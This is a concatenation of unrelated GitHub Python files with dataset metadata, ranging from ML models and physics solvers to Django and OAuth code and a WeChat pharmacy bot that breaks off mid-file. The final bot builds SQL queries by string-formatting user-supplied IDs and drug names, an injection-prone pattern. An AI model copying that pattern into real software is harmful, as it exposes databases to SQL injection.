train_loop.train(args.max_epochs)\r\n\r\n","repo_name":"jfsantos/irasl2018","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"10115162652","text":"import rclpy\nimport serial\nfrom rclpy.node import Node\nfrom std_msgs.msg import Float64MultiArray\n\nclass SerialPortSubscriber(Node):\n def __init__(self):\n super().__init__(\"serial_port_subscriber\")\n\n self.declare_parameter(\"port\", \"/dev/ttyACM0\")\n self.declare_parameter(\"baudrate\", \"9600\")\n\n self.port = self.get_parameter(\"port\").value\n self.baudrate = self.get_parameter(\"baudrate\").value\n self.topicName = \"serialPort\"\n\n self.get_logger().info(f'Port: {self.port}, Baudrate: {self.baudrate}, Topic: {self.topicName}')\n\n self.subscriber = self.create_subscription(\n Float64MultiArray,\n self.topicName,\n self.subsrciber_callback,\n 10\n )\n\n self.ser = serial.Serial(self.port, self.baudrate)\n self.serial_port_send()\n\n def subsrciber_callback(self, msg):\n self.get_logger().info(f'{msg}')\n self.ser.write(msg)\n\n def serial_port_send(self):\n try:\n while True:\n count = self.ser.inWaiting();\n if count > 0:\n data = self.ser.readline()\n self.get_logger().info(f'From {self.port}: {data}')\n\n except KeyboardInterrupt:\n if self.ser != None:\n self.ser.close()\n \ndef main(args=None):\n rclpy.init(args=args)\n\n subscriber = SerialPortSubscriber()\n rclpy.spin(subscriber)\n subscriber.destroy_node()\n rclpy.shutdown()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mertemre-qtr/LEAP-upper-limb","sub_path":"ros2_ws/src/test/serial_port/serial_port/basic_serial_port.py","file_name":"basic_serial_port.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12487855634","text":"#!/usr/bin/env python\n\n\n# Now that we know the 
predictions, we'll compute error using the area under the ROC curve. \n# This will tell us how \"good\" the model is -- closer to 1 means that the model is better.\n# Computing error is very important to knowing when your model is \"good\", and when it is \n# getting better or worse.\nactual = [int(r[1]) for r in test]\n\nfrom sklearn import metrics\n\n# Generate the roc curve using scikits-learn.\nfpr, tpr, thresholds = metrics.roc_curve(actual, predictions, pos_label=1)\n\n# Measure the area under the curve. The closer to 1, the \"better\" the predictions.\nprint(\"AUC of the predictions: {0}\".format(metrics.auc(fpr, tpr)))\n","repo_name":"dpezzin/dpezzin.github.io","sub_path":"test/Python/dataquest/probability_naive_bayes/calc_error.py","file_name":"calc_error.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16945661700","text":"import string\nimport torch\nimport torch.nn as nn\n\nfrom transformers import BertPreTrainedModel, BertModel, BertTokenizerFast\nfrom colbert.parameters import DEVICE\n\n\nclass ColBERT(BertPreTrainedModel):\n def __init__(self, config, query_maxlen, doc_maxlen, mask_punctuation, dim=128, similarity_metric='cosine'):\n\n super(ColBERT, self).__init__(config)\n\n self.query_maxlen = query_maxlen\n self.doc_maxlen = doc_maxlen\n self.similarity_metric = similarity_metric\n self.dim = dim\n\n self.mask_punctuation = mask_punctuation\n self.skiplist = {}\n\n if self.mask_punctuation:\n self.tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')\n self.skiplist = {w: True\n for symbol in string.punctuation\n for w in [symbol, self.tokenizer.encode(symbol, add_special_tokens=False)[0]]}\n\n self.bert = BertModel(config)\n self.linear = nn.Linear(config.hidden_size, dim, bias=False)\n\n self.init_weights()\n\n def forward(self, Q, D):\n return self.score(self.query(*Q), self.doc(*D))\n\n def query(self, input_ids, attention_mask):\n input_ids, attention_mask = input_ids.to(DEVICE), attention_mask.to(DEVICE)\n Q = self.bert(input_ids, attention_mask=attention_mask)[0]\n Q = self.linear(Q)\n\n return torch.nn.functional.normalize(Q, p=2, dim=2)\n\n def doc(self, input_ids, attention_mask, keep_dims=True):\n input_ids, attention_mask = input_ids.to(DEVICE), attention_mask.to(DEVICE)\n D = self.bert(input_ids, attention_mask=attention_mask)[0]\n D = self.linear(D)\n\n mask = torch.tensor(self.mask(input_ids), device=DEVICE).unsqueeze(2).float()\n D = D * mask\n\n D = torch.nn.functional.normalize(D, p=2, dim=2)\n\n if not keep_dims:\n D, mask = D.cpu().to(dtype=torch.float16), mask.cpu().bool().squeeze(-1)\n D = [d[mask[idx]] for idx, d in enumerate(D)]\n\n return D\n\n def score(self, Q, D):\n if self.similarity_metric == 'cosine':\n return (Q @ D.permute(0, 2, 1)).max(2).values.sum(1)\n\n assert self.similarity_metric == 'l2'\n return (-1.0 * ((Q.unsqueeze(2) - D.unsqueeze(1))**2).sum(-1)).max(-1).values.sum(-1)\n\n def mask(self, input_ids):\n mask = [[(x not in self.skiplist) and (x != 0) for x in d] for d in input_ids.cpu().tolist()]\n return mask\n","repo_name":"THUDM/P-tuning-v2","sub_path":"PT-Retrieval/colbert/colbert/modeling/colbert.py","file_name":"colbert.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":1727,"dataset":"github-code","pt":"53"} +{"seq_id":"15352320962","text":"import asyncio\n\nfrom errors.db_errors import DidntFindOneError\n\n\ndef loop(func):\n def wrapper(*args, 
**kwargs):\n print('start')\n my_loop = asyncio.get_event_loop()\n my_loop.run_until_complete(func(*args, **kwargs))\n print('end')\n return wrapper\n\n\n@loop\nasync def do_insert_one(collection, data):\n result = await collection.insert_one(data)\n print('result inserted %s' % repr(result.inserted_id))\n return 'result inserted %s' % repr(result.inserted_id)\n\n\n@loop\nasync def do_find_one(collection, data):\n try:\n result = await collection.find_one(data)\n except DidntFindOneError:\n ex = DidntFindOneError(f'Не удалось найти элемент в базе {collection} - {data}')\n print(ex)\n result = None\n print('result founded %s' % result)\n return result\n\n\n@loop\nasync def do_update_one(collection, data):\n result = await collection.update_one(data[0], data[1])\n print('result updated %s' % result)\n\n\n@loop\nasync def do_update_many(collection, data):\n result = await collection.update_many(data[0], data[1])\n print('result updated many %s' % result)\n\n\n@loop\nasync def do_delete_one(collection, data):\n result = await collection.delete_one(data)\n print('result deleted %s' % result)\n\n\n@loop\nasync def do_delete_many(collection, data):\n result = await collection.delete_many(data)\n print('result deleted many %s' % result)\n","repo_name":"VasiliySilver/Wumpus","sub_path":"db/moto_methods.py","file_name":"moto_methods.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35664271556","text":"from django.conf.urls.defaults import *\n\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nimport newssrv.views\n\n\nurlpatterns = patterns('',\n # Example:\n (r'^feed/', include('newssrv.feeds.urls')),\n\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/', include(admin.site.urls)),\n\n #(r'^accounts/', include('registration.backends.default.urls')),\n (r'^login$', newssrv.views.login_user),\n (r'^logout$', newssrv.views.logout_user),\n (r'^$', newssrv.views.main),\n)\n\n# import settings\n# if settings.DEBUG:\n \n# urlpatterns += patterns('',\n# url(r'^static/(?P.*)$', 'django.views.static.serve',\n# {\n# 'document_root': settings.STATIC_ROOT,\n# }),\n# )\n \n","repo_name":"gmh04/test","sub_path":"news/newssrv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9735635869","text":"import cgi\nimport pickle\n\nimport webapp2\nfrom oauth2client import xsrfutil\nfrom oauth2client.appengine import InvalidXsrfTokenError\nfrom oauth2client.appengine import xsrf_secret_key\nfrom oauth2client.client import Credentials\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.clientsecrets import InvalidClientSecretsError\nfrom webapp2_extras import sessions\nfrom webapp2_extras import sessions_memcache\nfrom webapp2ext import swagger\n\nfrom education.core import config\nfrom education.core import models\nfrom education.core.googleapi import service_acount_credentials\nfrom education.exceptions import InvalidCredentialsDomainError\nfrom education.exceptions import InvalidCredentialsError\n\n\nclass SessionMissingError(Exception):\n \"\"\"The Session is not setup.\"\"\"\n\n\n_sep = '::'\n\n\ndef sign_return_url(return_url, session_id):\n token = 
xsrfutil.generate_token(\n xsrf_secret_key(), session_id, action_id=str(return_url)\n )\n return _sep.join((token, return_url,))\n\n\ndef validate_return_url(state, session_id):\n token, return_url = state.split(_sep, 1)\n\n if not xsrfutil.validate_token(\n xsrf_secret_key(),\n token,\n session_id,\n action_id=str(return_url)\n ):\n raise InvalidXsrfTokenError()\n\n return return_url\n\n\ndef _safe_html(s):\n return cgi.escape(s, quote=1).replace(\"'\", ''')\n\n\nclass SessionMixin(object):\n\n CREDENTIALS_KEY = 'credentials'\n USER_ID_KEY = 'user_id'\n USER_DOMAIN = 'user_domain'\n APP_NAME = 'dashboard'\n\n def set_session_store(self):\n self.session_store = sessions.get_store(request=self.request)\n\n def save_session_store(self):\n self.session_store.save_sessions(self.response)\n\n def dispatch(self):\n # Get a session store for this request.\n self.set_session_store()\n webapp2.RequestHandler.dispatch(self)\n self.save_session_store()\n\n @webapp2.cached_property\n def cookie_session(self):\n return self.session_store.get_session(\n name='session_%s' % self.APP_NAME\n )\n\n @webapp2.cached_property\n def memcache_session(self):\n return self.session_store.get_session(\n name='mc_session_%s' % self.APP_NAME,\n factory=sessions_memcache.MemcacheSessionFactory\n )\n\n def session_id(self):\n self.memcache_session\n container = self.session_store.sessions.get(\n 'mc_session_%s' % self.APP_NAME\n )\n\n if container is None:\n raise SessionMissingError()\n\n return container.sid\n\n def save_credentials(self, credentials):\n self.reset_credentials()\n self.memcache_session[self.CREDENTIALS_KEY] = credentials.to_json()\n\n def get_user_credentials(self):\n j_credentials = self.memcache_session.get(self.CREDENTIALS_KEY)\n if j_credentials is None:\n return\n\n credentials = Credentials.new_from_json(j_credentials)\n if not credentials.invalid:\n return credentials\n\n def has_credentials(self):\n return self.get_user_credentials() is not None\n\n def reset_credentials(self):\n self.memcache_session[SessionMixin.CREDENTIALS_KEY] = None\n self.cookie_session[SessionMixin.USER_ID_KEY] = None\n self.cookie_session[SessionMixin.USER_DOMAIN] = None\n\n def current_user_id(self):\n user_id = self.cookie_session.get(self.USER_ID_KEY)\n if user_id:\n return user_id\n\n credentials = self.get_user_credentials()\n if credentials is None:\n return\n\n user_id = credentials.id_token.get('sub')\n if user_id is None:\n return\n\n self.cookie_session[self.USER_ID_KEY] = user_id\n return user_id\n\n def current_user_domain(self):\n domain = self.cookie_session.get(self.USER_DOMAIN)\n if domain:\n return domain\n\n credentials = self.get_user_credentials()\n if credentials is None:\n return\n\n domain = credentials.id_token.get('hd')\n if domain is None:\n return\n\n self.cookie_session[self.USER_DOMAIN] = domain\n return domain\n\n @webapp2.cached_property\n def flow(self):\n p_flow = self.memcache_session.get('flow')\n if p_flow is not None:\n return pickle.loads(p_flow)\n\n redirect_uri = self.request.relative_url(config.OAUTH_CALLBACK_URL)\n flow = flow_from_clientsecrets(\n config.OAUTH_SECRET_PATH_PATTERN % self.APP_NAME,\n scope=config.OAUTH_SCOPES,\n redirect_uri=redirect_uri\n )\n flow.params['access_type'] = 'online'\n self.memcache_session['flow'] = pickle.dumps(flow)\n return flow\n\n def save_flow(self):\n self.memcache_session['flow'] = pickle.dumps(self.flow)\n\n\nclass ApiRequestHandler(swagger.ApiRequestHandler, SessionMixin):\n \"\"\"Extends the base request handler to handle 
authentication\n\n \"\"\"\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get_current_user(self):\n user_id = self.get_current_user_id()\n if user_id:\n return models.User.get_by_id(user_id)\n\n def get_current_user_id(self):\n user_id = self.current_user_id()\n domain = self.current_user_domain()\n valid_domains = config.VALID_DOMAINS.keys()\n if user_id and domain in valid_domains:\n return user_id\n\n def admin_required(self, msg=None, admin_msg=None):\n user = self.login_required(msg=msg)\n if user.is_admin or user.is_domain_admin:\n return user\n\n self.abort(403, admin_msg)\n\n def get_current_user_data(self):\n return self.get_current_user()\n\n def student_required(self):\n \"\"\"Abort the request if the user is not a student\n\n \"\"\"\n return self.login_required()\n\n def staff_required(self):\n \"\"\"Abort the request if the user is not a staff mumber or\n an admin.\n\n \"\"\"\n user = self.login_required()\n if not user.is_staff:\n self.admin_required()\n\n return user\n\n\nclass LoginHandler(webapp2.RequestHandler, SessionMixin):\n \"\"\"Handle authentication of student and users.\n\n \"\"\"\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n \"\"\"Populate user's session with her oauth credential and her\n user id.\n\n If the user is new it will register her/him. Otherwise it will update\n her/his data.\n\n \"\"\"\n state = self.request.GET.get('state', None)\n if state:\n try:\n redirect_uri = validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n redirect_uri = config.DEFAULT_RETURN_URL\n else:\n redirect_uri = config.DEFAULT_RETURN_URL\n\n self.memcache_session.setdefault(SessionMixin.CREDENTIALS_KEY, None)\n self.cookie_session.setdefault(SessionMixin.USER_ID_KEY, None)\n self.cookie_session.setdefault(SessionMixin.USER_DOMAIN, None)\n\n try:\n models.User.update_or_create(\n self.current_user_id(),\n self.current_user_domain(),\n service_acount_credentials(self.APP_NAME),\n self.get_user_credentials()\n )\n except InvalidCredentialsDomainError:\n self.reset_credentials()\n if state:\n login_url = \"%s?state=%s\" % (config.LOGIN_URL, state,)\n else:\n login_url = config.LOGIN_URL\n self.response.write(\n ''\n '

Wrong domain'\n                'Your account is not managed by our domains (%s).'\n                ' Try login again with an other account.'\n                '
    '\n '' % (\n ', '.join(config.VALID_DOMAINS.keys()),\n login_url,\n )\n )\n return\n except InvalidClientSecretsError:\n self.abort(\n 500, \"Failed to load Oauth service account client secrets.\"\n )\n except InvalidCredentialsError:\n redirect_uri = self._state_oauth_flow(redirect_uri)\n\n self.redirect(str(redirect_uri))\n\n def _state_oauth_flow(self, redirect_uri):\n try:\n self.flow.params['state'] = sign_return_url(\n redirect_uri, self.session_id()\n )\n return self.flow.step1_get_authorize_url()\n except InvalidClientSecretsError:\n self.abort(500, \"Failed to load Oauth client secrets.\")\n\n\nclass LogoutHandler(webapp2.RequestHandler, SessionMixin):\n\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n state = self.request.GET.get('state', None)\n if state:\n try:\n redirect_uri = validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n redirect_uri = config.DEFAULT_RETURN_URL\n else:\n redirect_uri = config.DEFAULT_RETURN_URL\n\n self.reset_credentials()\n self.response.write(\n ''\n 'You are logged out. '\n 'Return'\n '' % redirect_uri\n )\n\n\nclass OauthCallbackHandler(webapp2.RequestHandler, SessionMixin):\n \"\"\"Handle exchanges of authorization code.\n\n \"\"\"\n\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n error = self.request.get('error')\n if error:\n errormsg = self.request.get('error_description', error)\n self.abort(\n 400,\n 'The authorization request failed: %s' % _safe_html(errormsg)\n )\n return\n\n state = self.request.GET.get('state', None)\n try:\n validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n self.abort(400, 'Failed to validate state')\n\n credentials = self.flow.step2_exchange(self.request.params)\n self.save_credentials(credentials)\n self.redirect(\"%s?state=%s\" % (config.LOGIN_URL, state,))\n","repo_name":"gayancliyanage/education","sub_path":"src/education/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34752721954","text":"# My name is Sofya.I am a 1st year CS student.\r\n# This program computes volume for a cube, a pyramid and an ellipsoid.\r\n\r\n# Create lists to store the results of volume calculations.\r\nlistCubeVolume=[]\r\nlistPyramidVolume=[]\r\nlistEllipsoidVolume=[]\r\n\r\n# Create functions to calculate and return volume for different shapes.\r\ndef cubeVolume(sideLength):\r\n volumeCube = round(sideLength ** 3, 1)\r\n listCubeVolume.append(str(volumeCube))\r\n print(\"The volume of a cube with a length of side of \"+str(sideLength)+\" is \"+str(volumeCube))\r\n\r\ndef pyramidVolume(height, baseLength):\r\n volumePyramid = round(1/3 * baseLength ** 2 * height, 1)\r\n listPyramidVolume.append(str(volumePyramid))\r\n print(\"The volume of a pyramid with the base length of \"+str(baseLength)+\" and the height of \"+str(height)+\" is \"+str(volumePyramid))\r\n\r\ndef ellipsoidVolume(r1, r2, r3):\r\n import math\r\n volumeEllipsoid = round((4/3 * math.pi * r1 * r2 * r3), 1)\r\n listEllipsoidVolume.append(str(volumeEllipsoid))\r\n print(\"The volume of an ellipsoid with three radius of \"+str(r1)+\" ,\"+str(r2)+\" ,\"+str(r3)+\" is \"+str(volumeEllipsoid)+\"\")\r\n\r\n# Ask user for the shape that he wants to know the volume of.\r\n# Based on the users input, prompt them for the necessary dimensions.\r\ndef computeVolume():\r\n shape = input('I will calculate 
the volume of a shape. What shape are you interested in?').lower()\r\n while shape != 'quit':\r\n if shape == 'cube':\r\n sideLength = int(input(\"What will be the length of the side for a cube? Enter:\" ))\r\n cubeVolume(sideLength)\r\n return computeVolume()\r\n elif shape == 'pyramid':\r\n baseLength = int(input(\"What will be the base length of a pyramid? Enter:\"))\r\n height = int(input(\"What will be the height of a pyramid? Enter:\"))\r\n pyramidVolume(height, baseLength)\r\n return computeVolume()\r\n elif shape == 'ellipsoid':\r\n r1=int(input(\"The first radius will be:\"))\r\n r2=int(input(\"The second radius will be:\"))\r\n r3=int(input(\"The third radius will be:\"))\r\n ellipsoidVolume(r1, r2, r3)\r\n return computeVolume()\r\n else:\r\n print(\"Invalid shape. You can enter 'cube', 'pyramid', 'ellipsoid' or, to end the session, 'quit'\")\r\n return computeVolume()\r\n\r\n# Make sure that loop will end as the user asks to quit the program.\r\n if shape == \"quit\":\r\n print(\"You have come to the end of the session.\")\r\n if len(listCubeVolume) == 0 and len(listPyramidVolume) == 0 and len(listEllipsoidVolume) == 0:\r\n print(\"You did not perform any volume calculations.\")\r\n else:\r\n print(\"The volumes calculated for each shape are shown below\")\r\n if len(listCubeVolume) == 0:\r\n print(\"\\nCube: No computations for this shape\", end=\"\")\r\n else:\r\n listCubeVolume.sort()\r\n print(\"\\nCube: \", end=\"\")\r\n for i in listCubeVolume:\r\n print(i,end=\",\")\r\n\r\n if len(listPyramidVolume) == 0:\r\n print(\"\\nPyramid: No computations for this shape\", end=\"\")\r\n else:\r\n listPyramidVolume.sort()\r\n print(\"\\nPyramid: \", end=\"\")\r\n for i in listPyramidVolume:\r\n print(i, end=\",\")\r\n\r\n if len(listEllipsoidVolume) == 0:\r\n print(\"\\nEllipsoid: No computations for this shape\", end=\"\")\r\n else:\r\n listEllipsoidVolume.sort()\r\n print(\"\\nEllipsoid: \", end=\"\")\r\n for i in listEllipsoidVolume:\r\n print(i, end=\",\")\r\n\r\n# The program starts.\r\ncomputeVolume()\r\n","repo_name":"sofya7/python-projects","sub_path":"spryadko_Assign2.py","file_name":"spryadko_Assign2.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27012938345","text":"# Functions for stimulus-aligning the data; organizing\n# data by trial versus sequentially and reshaping between\n# these two forms; etc.\n\nimport numpy as np\n\n\ndef align_by_stimulus(movie, stimulus_vector, time_before, time_after, reward_vector):\n n_frames, n_pixels = movie.shape\n f = {}\n f['stimulus_times'] = np.where(stimulus_vector != 0)[0]\n f['stimulus_contrast'] = stimulus_vector[f['stimulus_times']]\n n_trials = f['stimulus_times'].size\n trial_length = time_after + time_before\n f['start_times'] = np.maximum(0, f['stimulus_times'] - time_before)\n f['end_times'] = np.minimum(n_frames, f['stimulus_times'] + time_after)\n f['data'] = np.empty((n_trials, trial_length, n_pixels))\n for i in range(n_trials):\n f['data'][i] = movie[f['start_times'][i]:f['end_times'][i],:]\n f['reward_times'] = np.where(reward_vector != 0)[0]\n f['was_reward'] = np.zeros(n_trials)\n for i in range(f['reward_times'].size):\n f['was_reward'] = np.logical_or(f['was_reward'], np.logical_and(f['reward_times'][i] > f['stimulus_times'], f['reward_times'][i] < f['end_times']))\n return f\n\n# Takes a movie that is organized by trials and returns a movie organized sequentially\n# (3-dim to 2-dim). 
Left and right truncation values can be used if you don't want to\n# use the full length of the trial.\ndef reshape_trial_to_sequence(movie, left_truncation=0, right_truncation=0):\n n_trials, n_timesteps, n_pixels = movie.shape\n n_samples = n_trials*(n_timesteps - left_truncation - right_truncation)\n start_idx = left_truncation\n if right_truncation == 0:\n return movie[:,left_truncation:,:].reshape((n_samples, n_pixels))\n else:\n return movie[:,left_truncation:-right_truncation,:].reshape((n_samples, n_pixels))\n\n\ndef reshape_sequence_to_trial(movie, n_trials):\n n_samples, n_pixels = movie.shape\n return movie.reshape((n_trials, n_samples/n_trials, n_pixels))","repo_name":"kpchamp/widefield","sub_path":"widefield/tools/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5052609490","text":"\"\"\"\r\nQ-11:Represent a small bilingual (english-swedish) glossary given below as a python dictionary{\"merry\":\"god,\",\"chirstmas\":\"jul,\",\"and\":\"och\",\"happy\":\"gott\",\"new\":\"nytt\",\"year\":\"ar\"}and use it\r\nto translate your chirstmas wishes from english into swedish.that is, write a python function translate() that accepts the bilingual dictionary and a list of english words (your christmas\r\nwish) and returns a list of equivalent swedish words.\r\n\"\"\"\r\n\r\ndef translate(dict1,list1):\r\n list2=[]\r\n for i in list1:\r\n list2.append(dict1[i])\r\n return list2\r\ndict1={\"merry\":\"god,\",\"christmas\":\"jul\",\"and\":\"och\",\"happy\":\"gott\",\"new\":\"nytt\",\"year\":\"ar\"}\r\nlist1=[\"merry\",\"christmas\"]\r\nprint(translate(dict1,list1))\r\n\r\n\r\n","repo_name":"Ambika-dot/python_programming","sub_path":"python_Q_11.py","file_name":"python_Q_11.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10658943357","text":"#*************************************************************************************#\n# #\n# SUPERSONIC FLOW OVER A CONE #\n# #\n# (by solving Taylor-Maccoll equation) #\n# #\n#*************************************************************************************#\n\n#********************************* DESCRIPTION ***************************************\n\n\n\n#*********************************** INPUT *******************************************\n\nT0 = 300.0 # Total freestream temperature (K)\nC_p = 1005.0 # Specific heat at constant pressure (J/kg/K)\nbeta = 40.0 # Wave angle (degrees)\nM_inf = 2.0 # Freestream Mach number \ngamma = 1.4 # Adiabatic constant\n\n#***************************** IMPORTING PACKAGES ************************************\n# Standard packages\nfrom matplotlib.pyplot import *\nimport numpy as np\nimport math\n\n# User-defined packages\nfrom oblique_shock import *\nfrom taylor_maccoll import *\n\n#******************************** COMPUTATION ****************************************\n\nV_max = math.sqrt(2*C_p*T0) # Max theoretical speed\n[M_2, delta, beta] = oblique_shock_wave_properties(M_inf, beta, gamma)\n\n# Setting up initial conditions\nV = math.pow(2/((gamma - 1)*M_2**2) + 1, -0.5)\nV_r = [V*math.cos(beta - delta)]\nV_theta = [V*math.sin(beta - delta)]\n\n\n# Starting computations\ndel_theta = 10**-5\nerr = 1.0\ntol = 10.0**-8\n\ntheta = [beta]\ni = 0\n\nprint(\"Starting computation\")\nwhile err>tol:\n [V_r_local, V_theta_local] = euler_step_integration(theta[i], del_theta, 
gamma, V_r[i], V_theta[i])\n V_theta += [V_theta_local]\n V_r += [V_r_local]\n err = V_theta[i]\n print(err)\n i += 1\n theta = theta + [beta - i*del_theta]\n print(\"Ran incremental step : \"+str(i))\n \nprint(\"Semi-apex angle of the cone is \"+ str(theta[-1]*180/math.pi))\n\n# Checking\n\n\n\n\n\n\n\n\n\n# Writing to data files (preferably .vtk files)\nplot(np.array(theta)*180/math.pi, V_theta)\nxlabel(\"Theta (in degrees)\")\nylabel(\"V_theta\")\nshow()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kcavatar/conical_flow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42047638867","text":"import sys\n\nfrom aoc import read_input\n\n\ndef count_neighbour_faces_not_connected(x, y, z, this_face):\n faces = 6\n if x > 0 and cubes[x - 1][y][z] == this_face: faces -= 1\n if x < max_dimension and cubes[x + 1][y][z] == this_face: faces -= 1\n if y > 0 and cubes[x][y - 1][z] == this_face: faces -= 1\n if y < max_dimension and cubes[x][y + 1][z] == this_face: faces -= 1\n if z > 0 and cubes[x][y][z - 1] == this_face: faces -= 1\n if z < max_dimension and cubes[x][y][z + 1] == this_face: faces -= 1\n return faces\n\n\ndef flood_fill(x, y, z):\n if x < 0 or x > max_dimension or 0 < y > max_dimension or z < 0 or z > max_dimension:\n return\n if cubes[x][y][z] != 0:\n return\n\n cubes[x][y][z] = 2\n flood_fill(x + 1, y, z)\n flood_fill(x - 1, y, z)\n flood_fill(x, y + 1, z)\n flood_fill(x, y - 1, z)\n flood_fill(x, y, z + 1)\n flood_fill(x, y, z - 1)\n\n\nif __name__ == \"__main__\":\n # Construction\n lines = read_input(\"day18\", str)\n max_dimension = 0\n sys.setrecursionlimit(10000)\n print(sys.getrecursionlimit())\n for line in lines:\n x, y, z = line.split(\",\")\n max_dimension = max(max_dimension, int(x), int(y), int(z))\n\n cubes = [[[0 for x in range(max_dimension + 1)] for y in range(max_dimension + 1)] for z in\n range(max_dimension + 1)]\n for line in lines:\n x, y, z = line.split(\",\")\n cubes[int(x)][int(y)][int(z)] = 1\n\n # Part 1 - find all the faces\n total_faces = 0\n for x in range(max_dimension + 1):\n for y in range(max_dimension + 1):\n for z in range(max_dimension + 1):\n if cubes[x][y][z] == 1:\n total_faces += count_neighbour_faces_not_connected(x, y, z, 1)\n print(total_faces)\n assert total_faces == 4348\n # p1 = 4348\n\n # Part 2 - remove all the air bubbles\n flood_fill(0, 0, 0)\n air_bubbles = 0\n for x in range(max_dimension + 1):\n for y in range(max_dimension + 1):\n for z in range(max_dimension + 1):\n if cubes[x][y][z] == 0:\n air_bubbles += count_neighbour_faces_not_connected(x, y, z, 0)\n print(total_faces - air_bubbles)\n assert total_faces - air_bubbles == 2546\n # p2 = 2546\n","repo_name":"EthanArcher/adventofcode2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21525771375","text":"import json,time,os,socket,threading\n\nwx_gz_id = os.getenv('WX_GZ_ID')\nreply_text_template = '''\n\n\n{2}\n\n\n'''\n\ndef DBProxy_exec(json_data):\n data = json.dumps(json_data)\n print(data)\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n sock.sendto(data.encode(),(\"127.0.0.1\", 9999))\n data, from_addr = sock.recvfrom(10240)\n print(data)\n return json.loads(data.decode())\n return None\n\n# get user phone(member ID) and membership shop\ndef 
DBProxy_getUser(wx_id):\n sql = \"SELECT TOP 1 DH, LLBM FROM BM_WLDW WHERE CZ='{0}'\".format(wx_id)\n data = {}\n data['SQL'] = sql\n data = DBProxy_exec(data)\n if data and isinstance(data,list) and data[0] and isinstance(data[0],list) and data[0][0]:\n return (data[0][0],data[0][1])\n else:\n return (None,None)\n\ndef DBProxy_userPoints(wx_id):\n sql = \"SELECT SYJF FROM BM_WLDW WHERE CZ='{0}'\".format(wx_id)\n data={}\n data['SQL']=sql\n data = DBProxy_exec(data)\n if data and isinstance(data,list) and data[0] and isinstance(data[0],list):\n return data[0][0]\n else:\n return None\n\n# calculate drugs available number with sales data and receipt data\ndef DBProxy_getDrugs(drugName,shop):\n sql = \"SELECT SUM(SL), YPMC, SCCJ FROM XSD_MX WHERE YPMC like '%{0}%' and CKBM like '{1}%' group by YPMC, SCCJ\".format(drugName, shop)\n sale_data={}\n sale_data['SQL']=sql\n sale_data = DBProxy_exec(sale_data)\n if not sale_data and not isinstance(sale_data,list) and not sale_data[0] and not isinstance(sale_data[0],list):\n return None\n\n sql = \"SELECT SUM(SL), YPMC, SCCJ FROM RKD_MX WHERE YPMC like '%{0}%' and CKBM like '{1}%' group by YPMC, SCCJ\".format(drugName, shop)\n receipt_data={}\n receipt_data['SQL']=sql\n receipt_data = DBProxy_exec(receipt_data)\n if not receipt_data and not isinstance(receipt_data,list) and not receipt_data[0] and not isinstance(receipt_data[0],list):\n return None\n\n for receipt_item in receipt_data:\n for sale_item in sale_data:\n if sale_item[1] == receipt_item[1] and sale_item[2] == receipt_item[2]:\n receipt_item[0] = float(receipt_item[0]) - float(sale_item[0])\n return receipt_data\n \nclass WXStateInit:\n def __init__(self, WXUser):\n self.wx_user = WXUser\n\n def handle(self,data):\n \n if 'EventKey' in data and data['EventKey'] == 'HUI_USER_BONDING':\n phone = self.wx_user.getPhone()\n if phone:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '您已绑定过会员号({0}),如需更改请留言“重新绑定会员+手机号码”'.format(phone))\n\n self.wx_user.state = WXStateBonding(self.wx_user)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '请输入在本店注册会员时登记的手机号码:')\n\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_POINTS':\n points = DBProxy_userPoints(self.wx_user.wx_id)\n if points:\n msg = '您的积分余额为: {0} 